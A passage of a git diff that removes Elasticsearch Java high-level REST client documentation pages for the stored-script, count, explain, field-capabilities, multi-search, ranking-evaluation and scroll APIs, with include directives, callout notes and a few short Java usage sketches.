-["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/StoredScriptsDocumentationIT.java[get-stored-script-execute] --------------------------------------------------- - 
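Putting it together, a synchronous lookup might look roughly like this (a sketch:
`client` is an assumed `RestHighLevelClient`, `"calculate-score"` is a hypothetical
script id and imports are omitted):

[source,java]
--------------------------------------------------
GetStoredScriptRequest request = new GetStoredScriptRequest("calculate-score");
request.masterNodeTimeout(TimeValue.timeValueSeconds(50)); // optional master node timeout

GetStoredScriptResponse response = client.getScript(request, RequestOptions.DEFAULT);
StoredScriptSource script = response.getSource(); // the stored script: content plus metadata
String lang = script.getLang();                   // e.g. "painless"
String source = script.getSource();               // the script content itself
--------------------------------------------------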
-[[java-rest-high-get-stored-script-async]] -==== Asynchronous Execution - -The asynchronous execution of a get stored script request requires both the `GetStoredScriptRequest` -instance and an `ActionListener` instance to be passed to the asynchronous method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/StoredScriptsDocumentationIT.java[get-stored-script-execute-async] --------------------------------------------------- -<1> The `GetStoredScriptRequest` to execute and the `ActionListener` to use when -the execution completes - -[[java-rest-high-get-stored-script-listener]] -===== Action Listener - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `GetStoredScriptResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/StoredScriptsDocumentationIT.java[get-stored-script-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument - -[[java-rest-high-get-stored-script-response]] -==== Get Stored Script Response - -The returned `GetStoredScriptResponse` allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/StoredScriptsDocumentationIT.java[get-stored-script-response] --------------------------------------------------- -<1> The script object consists of a content and a metadata -<2> The language the script is written in, which defaults to `painless`. -<3> The content of the script -<4> Any named options that should be passed into the script. \ No newline at end of file diff --git a/docs/java-rest/high-level/script/put_script.asciidoc b/docs/java-rest/high-level/script/put_script.asciidoc deleted file mode 100644 index acc80e82d11..00000000000 --- a/docs/java-rest/high-level/script/put_script.asciidoc +++ /dev/null @@ -1,106 +0,0 @@ -[[java-rest-high-put-stored-script]] -=== Put Stored Script API - -[[java-rest-high-put-stored-script-request]] -==== Put Stored Script Request - -A `PutStoredScriptRequest` requires an `id` and `content`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/StoredScriptsDocumentationIT.java[put-stored-script-request] --------------------------------------------------- -<1> The id of the script -<2> The content of the script - -[[java-rest-high-put-stored-script-content]] -==== Content -The content of a script can be written in different languages and provided in -different ways: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/StoredScriptsDocumentationIT.java[put-stored-script-content-painless] --------------------------------------------------- -<1> Specify a painless script and provided as `XContentBuilder` object. 
-Note that the builder needs to be passed as a `BytesReference` object - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/StoredScriptsDocumentationIT.java[put-stored-script-content-mustache] --------------------------------------------------- -<1> Specify a mustache script and provided as `XContentBuilder` object. -Note that value of source can be directly provided as a JSON string - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/StoredScriptsDocumentationIT.java[put-stored-script-context] --------------------------------------------------- -<1> The context the script should be executed in. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/StoredScriptsDocumentationIT.java[put-stored-script-timeout] --------------------------------------------------- -<1> Timeout to wait for the all the nodes to acknowledge the script creation as a `TimeValue` -<2> Timeout to wait for the all the nodes to acknowledge the script creation as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/StoredScriptsDocumentationIT.java[put-stored-script-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -[[java-rest-high-put-stored-script-sync]] -==== Synchronous Execution -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/StoredScriptsDocumentationIT.java[put-stored-script-execute] --------------------------------------------------- - -[[java-rest-high-put-stored-script-async]] -==== Asynchronous Execution - -The asynchronous execution of a put stored script request requires both the `PutStoredScriptRequest` -instance and an `ActionListener` instance to be passed to the asynchronous method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/StoredScriptsDocumentationIT.java[put-stored-script-execute-async] --------------------------------------------------- -<1> The `PutStoredScriptRequest` to execute and the `ActionListener` to use when -the execution completes - -[[java-rest-high-put-stored-script-listener]] -===== Action Listener - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `AcknowledgedResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/StoredScriptsDocumentationIT.java[put-stored-script-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. 
The raised exception is provided as an argument - -[[java-rest-high-put-stored-script-response]] -==== Put Stored Script Response - -The returned `AcknowledgedResponse` allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/StoredScriptsDocumentationIT.java[put-stored-script-response] --------------------------------------------------- -<1> Indicates whether all of the nodes have acknowledged the request \ No newline at end of file diff --git a/docs/java-rest/high-level/search/count.asciidoc b/docs/java-rest/high-level/search/count.asciidoc deleted file mode 100644 index 2796d34ab36..00000000000 --- a/docs/java-rest/high-level/search/count.asciidoc +++ /dev/null @@ -1,96 +0,0 @@ --- -:api: count -:request: CountRequest -:response: CountResponse --- -[id="{upid}-{api}"] - -=== Count API - -[id="{upid}-{api}-request"] - -==== Count Request - -The +{request}+ is used to execute a query and get the number of matches for the query. The query to use in +{request}+ can be -set in similar way as query in `SearchRequest` using `SearchSourceBuilder`. - -In its most basic form, we can add a query to the request: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-basic] --------------------------------------------------- - -<1> Creates the +{request}+. Without arguments this runs against all indices. -<2> Most search parameters are added to the `SearchSourceBuilder`. -<3> Add a `match_all` query to the `SearchSourceBuilder`. -<4> Add the `SearchSourceBuilder` to the +{request}+. - -[[java-rest-high-count-request-optional]] -===== Count Request optional arguments - -A +{request}+ also takes the following optional arguments: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-args] --------------------------------------------------- -<1> Restricts the request to an index -<2> Set a routing parameter -<3> Setting `IndicesOptions` controls how unavailable indices are resolved and how wildcard expressions are expanded -<4> Use the preference parameter e.g. to execute the search to prefer local shards. The default is to randomize across shards. - -===== Using the SearchSourceBuilder in CountRequest - -Both in search and count API calls, most options controlling the search behavior can be set on the `SearchSourceBuilder`, -which contains more or less the equivalent of the options in the search request body of the Rest API. - -Here are a few examples of some common options: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-source-basics] --------------------------------------------------- -<1> Create a `SearchSourceBuilder` with default options. -<2> Set the query. 
Can be any type of `QueryBuilder`
-
-After this, the `SearchSourceBuilder` only needs to be added to the
-+{request}+:
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-source-setter]
---------------------------------------------------
-
-Note the subtle difference between using `SearchSourceBuilder` in a `SearchRequest` and in a +{request}+: with a
-`SearchRequest`, the `SearchSourceBuilder.size()` and `SearchSourceBuilder.from()` methods set the
-number of search hits to return and the starting index, whereas in +{request}+ we are only interested in the
-total number of matches, so these methods have no meaning there.
-
-The <> page gives a list of all available search queries with
-their corresponding `QueryBuilder` objects and `QueryBuilders` helper methods.
-
-include::../execution.asciidoc[]
-
-[id="{upid}-{api}-response"]
-==== CountResponse
-
-The +{response}+ returned by executing the count API call provides the total count of hits and details about the count execution
-itself, such as the HTTP status code, or whether the request terminated early:
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-response-1]
---------------------------------------------------
-
-The response also provides information about the execution on the
-shard level by offering statistics about the total number of shards that were
-affected by the underlying search, and the successful vs. unsuccessful shards. Possible
-failures can also be handled by iterating over an array of
-`ShardSearchFailure` like in the following example:
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-response-2]
---------------------------------------------------
-
diff --git a/docs/java-rest/high-level/search/explain.asciidoc b/docs/java-rest/high-level/search/explain.asciidoc
deleted file mode 100644
index fd23bf1b80c..00000000000
--- a/docs/java-rest/high-level/search/explain.asciidoc
+++ /dev/null
@@ -1,112 +0,0 @@
-[[java-rest-high-explain]]
-=== Explain API
-
-The explain API computes a score explanation for a query and a specific document.
-This can give useful feedback on whether or not a document matched a specific query.
-
-[[java-rest-high-explain-request]]
-==== Explain Request
-
-An `ExplainRequest` expects an `index` and an `id` to identify a specific document,
-and a query represented by a `QueryBuilder` to run against it (see <>).
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests}/SearchDocumentationIT.java[explain-request]
---------------------------------------------------
-
-===== Optional arguments
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests}/SearchDocumentationIT.java[explain-request-routing]
---------------------------------------------------
-<1> Set a routing parameter
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests}/SearchDocumentationIT.java[explain-request-preference]
---------------------------------------------------
-<1> Use the preference parameter e.g. to execute the search to prefer local
-shards.
The default is to randomize across shards. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[explain-request-source] --------------------------------------------------- -<1> Set to true to retrieve the _source of the document explained. You can also -retrieve part of the document by using _source_include & _source_exclude -(see <> for more details) - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[explain-request-stored-field] --------------------------------------------------- -<1> Allows to control which stored fields to return as part of the document explained -(requires the field to be stored separately in the mappings). - -[[java-rest-high-explain-sync]] -==== Synchronous Execution - -The `explain` method executes the request synchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[explain-execute] --------------------------------------------------- - -[[java-rest-high-explain-async]] -==== Asynchronous Execution - -The `explainAsync` method executes the request asynchronously, -calling the provided `ActionListener` when the response is ready: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[explain-execute-async] --------------------------------------------------- -<1> The `ExplainRequest` to execute and the `ActionListener` to use when -the execution completes. - -The asynchronous method does not block and returns immediately. Once the request -completes, the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `ExplainResponse` is constructed as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[explain-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. -<2> Called when the whole `ExplainRequest` fails. - -[[java-rest-high-explain-response]] -==== ExplainResponse - -The `ExplainResponse` contains the following information: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[explain-response] --------------------------------------------------- -<1> The index name of the explained document. -<2> The id of the explained document. -<3> Indicates whether or not the explained document exists. -<4> Indicates whether or not there is a match between the explained document and -the provided query (the `match` is retrieved from the lucene `Explanation` behind the scenes -if the lucene `Explanation` models a match, it returns `true`, otherwise it returns `false`). -<5> Indicates whether or not there exists a lucene `Explanation` for this request. -<6> Get the lucene `Explanation` object if there exists. -<7> Get the `GetResult` object if the `_source` or the stored fields are retrieved. - -The `GetResult` contains two maps internally to store the fetched `_source` and stored fields. 
-You can use the following methods to get them:
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests}/SearchDocumentationIT.java[get-result]
---------------------------------------------------
-<1> Retrieve the `_source` as a map.
-<2> Retrieve the specified stored fields as a map.
diff --git a/docs/java-rest/high-level/search/field-caps.asciidoc b/docs/java-rest/high-level/search/field-caps.asciidoc
deleted file mode 100644
index 1f5b10ad034..00000000000
--- a/docs/java-rest/high-level/search/field-caps.asciidoc
+++ /dev/null
@@ -1,82 +0,0 @@
-[[java-rest-high-field-caps]]
-=== Field Capabilities API
-
-The field capabilities API allows for retrieving the capabilities of fields across multiple indices.
-
-[[java-rest-high-field-caps-request]]
-==== Field Capabilities Request
-
-A `FieldCapabilitiesRequest` contains the list of fields for which capabilities
-should be returned, plus an optional list of target indices. If no indices
-are provided, the request will be executed on all indices.
-
-Note that the fields parameter supports wildcard notation. For example, providing `text_*`
-will cause all fields that match the expression to be returned.
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests}/SearchDocumentationIT.java[field-caps-request]
---------------------------------------------------
-
-[[java-rest-high-field-caps-request-optional]]
-===== Optional arguments
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests}/SearchDocumentationIT.java[field-caps-request-indicesOptions]
---------------------------------------------------
-<1> Setting `IndicesOptions` controls how unavailable indices are resolved and
-how wildcard expressions are expanded.
-
-[[java-rest-high-field-caps-sync]]
-==== Synchronous Execution
-
-The `fieldCaps` method executes the request synchronously:
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests}/SearchDocumentationIT.java[field-caps-execute]
---------------------------------------------------
-
-[[java-rest-high-field-caps-async]]
-==== Asynchronous Execution
-
-The `fieldCapsAsync` method executes the request asynchronously,
-calling the provided `ActionListener` when the response is ready:
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests}/SearchDocumentationIT.java[field-caps-execute-async]
---------------------------------------------------
-<1> The `FieldCapabilitiesRequest` to execute and the `ActionListener` to use when
-the execution completes.
-
-The asynchronous method does not block and returns immediately. Once the request
-completes, the `ActionListener` is called back using the `onResponse` method
-if the execution successfully completed or using the `onFailure` method if
-it failed.
-
-A typical listener for `FieldCapabilitiesResponse` is constructed as follows:
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests}/SearchDocumentationIT.java[field-caps-execute-listener]
---------------------------------------------------
-<1> Called when the execution is successfully completed.
-<2> Called when the whole `FieldCapabilitiesRequest` fails.
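Before looking at the response in detail below, here is a rough end-to-end sketch
(`client` is an assumed `RestHighLevelClient`, the index names are hypothetical and
imports are omitted):

[source,java]
--------------------------------------------------
FieldCapabilitiesRequest request = new FieldCapabilitiesRequest()
    .fields("user")               // wildcards such as "user*" are also accepted
    .indices("posts", "authors"); // omit indices() to target all indices

FieldCapabilitiesResponse response = client.fieldCaps(request, RequestOptions.DEFAULT);

// capabilities of the "user" field, keyed by type (e.g. "keyword", "text")
Map<String, FieldCapabilities> userCaps = response.getField("user");
--------------------------------------------------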
- -[[java-rest-high-field-caps-response]] -==== FieldCapabilitiesResponse - -For each requested field, the returned `FieldCapabilitiesResponse` contains its type -and whether or not it can be searched or aggregated on. The response also gives -information about how each index contributes to the field's capabilities. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[field-caps-response] --------------------------------------------------- -<1> A map with entries for the field's possible types, in this case `keyword` and `text`. -<2> All indices where the `user` field has type `keyword`. -<3> The subset of these indices where the `user` field isn't searchable, or null if it's always searchable. -<4> Another subset of these indices where the `user` field isn't aggregatable, or null if it's always aggregatable. \ No newline at end of file diff --git a/docs/java-rest/high-level/search/multi-search-template.asciidoc b/docs/java-rest/high-level/search/multi-search-template.asciidoc deleted file mode 100644 index c5133f6614e..00000000000 --- a/docs/java-rest/high-level/search/multi-search-template.asciidoc +++ /dev/null @@ -1,81 +0,0 @@ -[[java-rest-high-multi-search-template]] -=== Multi-Search-Template API - -The `multiSearchTemplate` API executes multiple <> -requests in a single http request in parallel. - -[[java-rest-high-multi-search-template-request]] -==== Multi-Search-Template Request - -The `MultiSearchTemplateRequest` is built empty and you add all of the searches that -you wish to execute to it: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[multi-search-template-request-inline] --------------------------------------------------- -<1> Create an empty `MultiSearchTemplateRequest`. -<2> Create one or more `SearchTemplateRequest` objects and populate them just like you -would for a regular <>. -<3> Add the `SearchTemplateRequest` to the `MultiSearchTemplateRequest`. - -===== Optional arguments - -The multiSearchTemplate's `max_concurrent_searches` request parameter can be used to control -the maximum number of concurrent searches the multi search api will execute. -This default is based on the number of data nodes and the default search thread pool size. - -[[java-rest-high-multi-search-template-sync]] -==== Synchronous Execution - -The `multiSearchTemplate` method executes `MultiSearchTemplateRequest`s synchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[multi-search-template-request-sync] --------------------------------------------------- - -[[java-rest-high-multi-search-template-async]] -==== Asynchronous Execution - -The `multiSearchTemplateAsync` method executes `MultiSearchTemplateRequest`s asynchronously, -calling the provided `ActionListener` when the response is ready. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[multi-search-template-execute-async] --------------------------------------------------- -The parameters are the `MultiSearchTemplateRequest` to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. 
Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `MultiSearchTemplateResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[multi-search-template-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. -<2> Called when the whole `MultiSearchTemplateRequest` fails. - -==== MultiSearchTemplateResponse - -The `MultiSearchTemplateResponse` that is returned by executing the `multiSearchTemplate` method contains -a `MultiSearchTemplateResponse.Item` for each `SearchTemplateRequest` in the -`MultiSearchTemplateRequest`. Each `MultiSearchTemplateResponse.Item` contains an -exception in `getFailure` if the request failed or a -<> in `getResponse` if -the request succeeded: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[multi-search-template-response] --------------------------------------------------- -<1> An array of responses is returned - one response for each request -<2> Failed search template requests have error messages -<3> Successful requests contain a <> in -`getResponse`. diff --git a/docs/java-rest/high-level/search/multi-search.asciidoc b/docs/java-rest/high-level/search/multi-search.asciidoc deleted file mode 100644 index 205fe4bfe93..00000000000 --- a/docs/java-rest/high-level/search/multi-search.asciidoc +++ /dev/null @@ -1,89 +0,0 @@ -[[java-rest-high-multi-search]] -=== Multi-Search API - -The `multiSearch` API executes multiple <> -requests in a single http request in parallel. - -[[java-rest-high-multi-search-request]] -==== Multi-Search Request - -The `MultiSearchRequest` is built empty and you add all of the searches that -you wish to execute to it: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[multi-search-request-basic] --------------------------------------------------- -<1> Create an empty `MultiSearchRequest`. -<2> Create an empty `SearchRequest` and populate it just like you -would for a regular <>. -<3> Add the `SearchRequest` to the `MultiSearchRequest`. -<4> Build a second `SearchRequest` and add it to the `MultiSearchRequest`. - -===== Optional arguments - -The `SearchRequest`s inside of `MultiSearchRequest` support all of -<>'s optional arguments. 
-For example: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[search-request-indices] --------------------------------------------------- -<1> Restricts the request to an index - -[[java-rest-high-multi-search-sync]] -==== Synchronous Execution - -The `multiSearch` method executes `MultiSearchRequest`s synchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[multi-search-execute] --------------------------------------------------- - -[[java-rest-high-multi-search-async]] -==== Asynchronous Execution - -The `multiSearchAsync` method executes `MultiSearchRequest`s asynchronously, -calling the provided `ActionListener` when the response is ready. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[multi-search-execute-async] --------------------------------------------------- -<1> The `MultiSearchRequest` to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `MultiSearchResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[multi-search-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. -<2> Called when the whole `SearchRequest` fails. - -==== MultiSearchResponse - -The `MultiSearchResponse` that is returned by executing the `multiSearch` method contains -a `MultiSearchResponse.Item` for each `SearchRequest` in the -`MultiSearchRequest`. Each `MultiSearchResponse.Item` contains an -exception in `getFailure` if the request failed or a -<> in `getResponse` if -the request succeeded: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[multi-search-response] --------------------------------------------------- -<1> The item for the first search. -<2> It succeeded so `getFailure` returns null. -<3> And there is a <> in -`getResponse`. -<4> The item for the second search. diff --git a/docs/java-rest/high-level/search/rank-eval.asciidoc b/docs/java-rest/high-level/search/rank-eval.asciidoc deleted file mode 100644 index 195e1f92f3b..00000000000 --- a/docs/java-rest/high-level/search/rank-eval.asciidoc +++ /dev/null @@ -1,89 +0,0 @@ -[[java-rest-high-rank-eval]] -=== Ranking Evaluation API - -The `rankEval` method allows to evaluate the quality of ranked search -results over a set of search request. Given sets of manually rated -documents for each search request, ranking evaluation performs a -<> request and calculates -information retrieval metrics like _mean reciprocal rank_, _precision_ -or _discounted cumulative gain_ on the returned results. - -[[java-rest-high-rank-eval-request]] -==== Ranking Evaluation Request - -In order to build a `RankEvalRequest`, you first need to create an -evaluation specification (`RankEvalSpec`). 
This specification requires -to define the evaluation metric that is going to be calculated, as well -as a list of rated documents per search requests. Creating the ranking -evaluation request then takes the specification and a list of target -indices as arguments: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[rank-eval-request-basic] --------------------------------------------------- -<1> Define the metric used in the evaluation -<2> Add rated documents, specified by index name, id and rating -<3> Create the search query to evaluate -<4> Combine the three former parts into a `RatedRequest` -<5> Create the ranking evaluation specification -<6> Create the ranking evaluation request - -[[java-rest-high-rank-eval-sync]] -==== Synchronous Execution - -The `rankEval` method executes `RankEvalRequest`s synchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[rank-eval-execute] --------------------------------------------------- - -[[java-rest-high-rank-eval-async]] -==== Asynchronous Execution - -The `rankEvalAsync` method executes `RankEvalRequest`s asynchronously, -calling the provided `ActionListener` when the response is ready. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[rank-eval-execute-async] --------------------------------------------------- -<1> The `RankEvalRequest` to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `RankEvalResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[rank-eval-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. -<2> Called when the whole `RankEvalRequest` fails. - -==== RankEvalResponse - -The `RankEvalResponse` that is returned by executing the request -contains information about the overall evaluation score, the -scores of each individual search request in the set of queries and -detailed information about search hits and details about the metric -calculation per partial result. 
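Before drilling into the individual response accessors below, the following sketch ties
the request pieces together (class names come from the rank evaluation module referenced
above, but the exact constructor shapes are assumptions; `client` is an assumed
`RestHighLevelClient` and imports are omitted):

[source,java]
--------------------------------------------------
EvaluationMetric metric = new PrecisionAtK();                // the metric to calculate
RatedDocument ratedDoc = new RatedDocument("posts", "1", 1); // index, id and rating
SearchSourceBuilder query = new SearchSourceBuilder()
    .query(QueryBuilders.matchQuery("user", "kimchy"));      // the search query to evaluate
RatedRequest ratedRequest =
    new RatedRequest("kimchy_query", Collections.singletonList(ratedDoc), query);
RankEvalSpec spec = new RankEvalSpec(Collections.singletonList(ratedRequest), metric);
RankEvalRequest request = new RankEvalRequest(spec, new String[] { "posts" });

RankEvalResponse response = client.rankEval(request, RequestOptions.DEFAULT);
double overallScore = response.getMetricScore();             // the overall evaluation result
--------------------------------------------------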
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[rank-eval-response] --------------------------------------------------- -<1> The overall evaluation result -<2> Partial results that are keyed by their query id -<3> The metric score for each partial result -<4> Rated search hits contain a fully fledged `SearchHit` -<5> Rated search hits also contain an `Optional` rating that -is not present if the document did not get a rating in the request -<6> Metric details are named after the metric used in the request -<7> After casting to the metric used in the request, the -metric details offers insight into parts of the metric calculation \ No newline at end of file diff --git a/docs/java-rest/high-level/search/scroll.asciidoc b/docs/java-rest/high-level/search/scroll.asciidoc deleted file mode 100644 index 8285243103a..00000000000 --- a/docs/java-rest/high-level/search/scroll.asciidoc +++ /dev/null @@ -1,220 +0,0 @@ -[[java-rest-high-search-scroll]] -=== Search Scroll API - -The Scroll API can be used to retrieve a large number of results from -a search request. - -In order to use scrolling, the following steps need to be executed in the -given order. - - -==== Initialize the search scroll context - -An initial search request with a `scroll` parameter must be executed to -initialize the scroll session through the <>. -When processing this `SearchRequest`, Elasticsearch detects the presence of -the `scroll` parameter and keeps the search context alive for the -corresponding time interval. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[search-scroll-init] --------------------------------------------------- -<1> Create the `SearchRequest` and its corresponding `SearchSourceBuilder`. -Also optionally set the `size` to control how many results to retrieve at -a time. -<2> Set the scroll interval -<3> Read the returned scroll id, which points to the search context that's -being kept alive and will be needed in the following search scroll call -<4> Retrieve the first batch of search hits - -==== Retrieve all the relevant documents - -As a second step, the received scroll identifier must be set to a -`SearchScrollRequest` along with a new scroll interval and sent through the -`searchScroll` method. Elasticsearch returns another batch of results with -a new scroll identifier. This new scroll identifier can then be used in a -subsequent `SearchScrollRequest` to retrieve the next batch of results, -and so on. This process should be repeated in a loop until no more results are -returned, meaning that the scroll has been exhausted and all the matching -documents have been retrieved. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[search-scroll2] --------------------------------------------------- -<1> Create the `SearchScrollRequest` by setting the required scroll id and -the scroll interval -<2> Read the new scroll id, which points to the search context that's -being kept alive and will be needed in the following search scroll call -<3> Retrieve another batch of search hits -<4> - -==== Clear the scroll context - -Finally, the last scroll identifier can be deleted using the <> -in order to release the search context. 
This happens automatically when the -scroll expires, but it's good practice to do it as soon as the scroll session -is completed. - -==== Optional arguments - -The following arguments can optionally be provided when constructing -the `SearchScrollRequest`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[scroll-request-arguments] --------------------------------------------------- -<1> Scroll interval as a `TimeValue` -<2> Scroll interval as a `String` - -If no `scroll` value is set for the `SearchScrollRequest`, the search context will -expire once the initial scroll time expired (ie, the scroll time set in the -initial search request). - -[[java-rest-high-search-scroll-sync]] -==== Synchronous Execution - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[search-scroll-execute-sync] --------------------------------------------------- - -[[java-rest-high-search-scroll-async]] -==== Asynchronous Execution - -The asynchronous execution of a search scroll request requires both the `SearchScrollRequest` -instance and an `ActionListener` instance to be passed to the asynchronous -method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[search-scroll-execute-async] --------------------------------------------------- -<1> The `SearchScrollRequest` to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `SearchResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[search-scroll-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument - -[[java-rest-high-search-scroll-response]] -==== Response - -The search scroll API returns a `SearchResponse` object, same as the -Search API. - -[[java-rest-high-search-scroll-example]] -==== Full example - -The following is a complete example of a scrolled search. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[search-scroll-example] --------------------------------------------------- -<1> Initialize the search context by sending the initial `SearchRequest` -<2> Retrieve all the search hits by calling the Search Scroll api in a loop -until no documents are returned -<3> Process the returned search results -<4> Create a new `SearchScrollRequest` holding the last returned scroll -identifier and the scroll interval -<5> Clear the scroll context once 